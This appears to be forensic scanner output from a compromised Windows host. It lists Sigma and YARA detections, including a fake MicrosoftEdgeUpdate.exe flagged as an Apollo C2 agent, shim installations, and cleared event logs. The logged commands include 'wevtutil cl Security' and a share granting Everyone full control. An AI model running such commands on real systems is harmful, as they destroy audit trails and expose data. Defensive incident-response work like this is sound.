REASONS_COUNT:
1
|
Warning 37
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:42:52 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9956 NewProcessName: C:\Windows\SysWOW64\net.exe TokenElevationType: %%1936 ProcessId: 8688 CommandLine: net share Certs=C:\Certs /grant:Everyone,full TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\cmd.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725363772041957e+09 EventRecordID: 144063 Execution_ProcessID: 4 Execution_ThreadID: 7132 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Grant Overpermissive Permissions To Files Or Shares
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/16
DESCRIPTION_1:
Detects the granting of overly permissive such as "FULL CONTROL" permissions to files or shares to groups such as "Everyone"
AUTHOR_1:
Nasreddine Bencherchali
ID_1:
0f9de3a8-ff08-433b-821a-fa241c811a36
FALSEPOSITIVES_1:
Rare FP could occur with some scripts and administrators
REASONS_COUNT:
1
|
Warning 38
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:42:52 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 5672 NewProcessName: C:\Windows\SysWOW64\net1.exe TokenElevationType: %%1936 ProcessId: 9956 CommandLine: C:\Windows\system32\net1 share Certs=C:\Certs /grant:Everyone,full TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\net.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253637720667424e+09 EventRecordID: 144064 Execution_ProcessID: 4 Execution_ThreadID: 7844 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Grant Overpermissive Permissions To Files Or Shares
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/16
DESCRIPTION_1:
Detects the granting of overly permissive such as "FULL CONTROL" permissions to files or shares to groups such as "Everyone"
AUTHOR_1:
Nasreddine Bencherchali
ID_1:
0f9de3a8-ff08-433b-821a-fa241c811a36
FALSEPOSITIVES_1:
Rare FP could occur with some scripts and administrators
REASONS_COUNT:
1
|
Warning 39
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 12:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 8564 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253649195170047e+09 EventRecordID: 144096 Execution_ProcessID: 4 Execution_ThreadID: 2020 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 40
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 13:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3064 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253685195597825e+09 EventRecordID: 144316 Execution_ProcessID: 4 Execution_ThreadID: 3192 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 41
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 14:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9944 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253721195965807e+09 EventRecordID: 144421 Execution_ProcessID: 4 Execution_ThreadID: 6508 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 42
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 15:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3972 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253757196591663e+09 EventRecordID: 144506 Execution_ProcessID: 4 Execution_ThreadID: 1084 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 43
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 16:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 2556 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253793198101137e+09 EventRecordID: 144560 Execution_ProcessID: 4 Execution_ThreadID: 4600 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 44
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 17:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 6336 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253829198586817e+09 EventRecordID: 144604 Execution_ProcessID: 4 Execution_ThreadID: 5400 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 45
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Suspicious eventlog entry found
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3952 NewProcessName: C:\Windows\SysWOW64\cmd.exe TokenElevationType: %%1936 ProcessId: 2252 CommandLine: cmd.exe /S /c wevtutil cl Security TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725358264763456e+09 EventRecordID: 143905 Execution_ProcessID: 4 Execution_ThreadID: 2784 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
60
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
REASON_1:
YARA rule LOG_Win_Destructive_Activity / Detects Windows commands often used on Ransomware or sabotage attacks
SUBSCORE_1:
60
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-02-12
TAGS_1:
CRIME, LOG, RANSOM
RULENAME_1: LOG_Win_Destructive_Activity
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\cmd.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
236032
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Jan 21 10:00:55.598 2023
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows Command Processor
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
Cmd.Exe.MUI
INTERNAL_NAME_1:
cmd
IMPHASH_1:
392b4d61b1d1dadc1f06444df258188a
FILE_2:
C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe
EXISTS_2:
no
FILE_3:
E:\Windows\System32\winevt\Logs\Security.evtx
EXISTS_3:
yes
TYPE_3:
EVTX
SIZE_3:
1118208
FIRSTBYTES_3:
456c6646696c6500000000000000000000000000 / ElfFile
CREATED_3:
Tue Jun 4 02:25:39.557 2024
OWNER_3:
NT AUTHORITY\LOCAL SERVICE
|
Warning 46
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Mon Jul 22 15:21:45 2024
ENTRY:
SubjectUserName: Admin SubjectDomainName: PC01243 Channel: System BackupPath: ClientProcessId: 5448 ClientProcessStartKey: 3377699720529630 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.721661705973029e+09 EventRecordID: 2980 Execution_ProcessID: 2052 Execution_ThreadID: 10084 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-21-395486425-972718290-1458454356-1001
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 47
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Mon Jul 22 15:21:46 2024
ENTRY:
SubjectUserName: Admin SubjectDomainName: PC01243 Channel: Windows PowerShell BackupPath: ClientProcessId: 6844 ClientProcessStartKey: 3377699720529649 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7216617065201025e+09 EventRecordID: 2983 Execution_ProcessID: 2052 Execution_ThreadID: 10084 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-21-395486425-972718290-1458454356-1001
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 48
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:15:57 2024
ENTRY:
SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY Channel: Microsoft-Windows-Sysmon/Operational BackupPath: ClientProcessId: 7672 ClientProcessStartKey: 4785074604081616 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253549574365888e+09 EventRecordID: 6626 Execution_ProcessID: 2160 Execution_ThreadID: 7916 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 49
|
Sep 10 12:57:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackup.dll
EXT:
.dll
TYPE:
EXE
SIZE:
1872896
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Aug 13 19:55:34.134 2024
MODIFIED:
Tue Aug 13 19:55:34.166 2024
ACCESSED:
Thu Aug 29 12:16:12.473 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
WindowsBackup.dll
INTERNAL_NAME:
WindowsBackup.dll
IMPHASH:
3120c38e9c80219e9c8bb33cf385dfd1
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 50
|
Sep 10 12:58:24 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe
EXT:
.exe
TYPE:
EXE
SIZE:
2137088
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Sep 3 09:04:51.740 2024
MODIFIED:
Tue Sep 3 09:04:51.781 2024
ACCESSED:
Tue Sep 3 13:11:25.617 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
DESC:
Ollopa
LEGAL_COPYRIGHT:
Copyright © 2021
PRODUCT:
Ollopa
ORIGINAL_NAME:
Apollo.exe
INTERNAL_NAME:
Apollo.exe
IMPHASH:
f34d5f2d4577ed6d9ceec516c1f5a744
REASON_1:
YARA rule MAL_Apollo_Agent_Oct22 / Detects Apollo Windows agent written in C# NET 4.0, often used in combination with Mythic C2
SUBSCORE_1:
80
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-10-05
TAGS_1:
EXE, MAL
RULENAME_1: MAL_Apollo_Agent_Oct22
AUTHOR_1:
Paul Hager
REASONS_COUNT:
1
|
Warning 51
|
Sep 10 13:03:51 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
75
FILE:
E:\Windows\WinSxS\amd64_microsoft-windows-host-network-service_31bf3856ad364e35_10.0.22621.3880_none_daa6f825dbd9c2c0\HostNetworkingService.psm1
EXT:
.psm1
TYPE:
UNKNOWN
SIZE:
1264
FIRSTBYTES:
444353010100000004190000e004000004190000 / DCS
CREATED:
Sat May 7 05:20:17.750 2022
MODIFIED:
Sat May 7 05:34:04.392 2022
ACCESSED:
Thu Aug 15 02:41:31.786 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
BUILTIN\Administrators
REASON_1:
YARA rule SUSP_Reversed_PowerShell_Code / Detects reversed PowerShell strings
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-11-30
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_Reversed_PowerShell_Code
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 52
|
Sep 10 13:04:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Windows\WinSxS\amd64_microsoft-windows-n..diagnostics-package_31bf3856ad364e35_10.0.22621.2506_none_9d9261a7c28d6dc6\r\NetworkDiagnosticsTroubleshoot.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
616
FIRSTBYTES:
62820f93504133308016d7d5deb19d01607d0c08 / bPA30ޱ`}
CREATED:
Fri Apr 5 23:03:11.272 2024
MODIFIED:
Fri Apr 5 23:03:11.272 2024
ACCESSED:
Fri Apr 5 23:03:11.272 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
YARA rule SUSP_PS1_Loader_Generic_Feb21 / Detects file that look like PowerShell loaders
SUBSCORE_1:
65
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-02-12
TAGS_1:
GEN, SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Loader_Generic_Feb21
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 53
|
Sep 10 13:08:17 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.3880_none_0c186f11e5fa3786\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
EXE
SIZE:
1860096
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Mon Jul 22 15:18:27.144 2024
MODIFIED:
Mon Jul 22 15:18:27.176 2024
ACCESSED:
Wed Aug 21 00:33:33.135 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
WindowsBackup.dll
INTERNAL_NAME:
WindowsBackup.dll
IMPHASH:
3120c38e9c80219e9c8bb33cf385dfd1
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 54
|
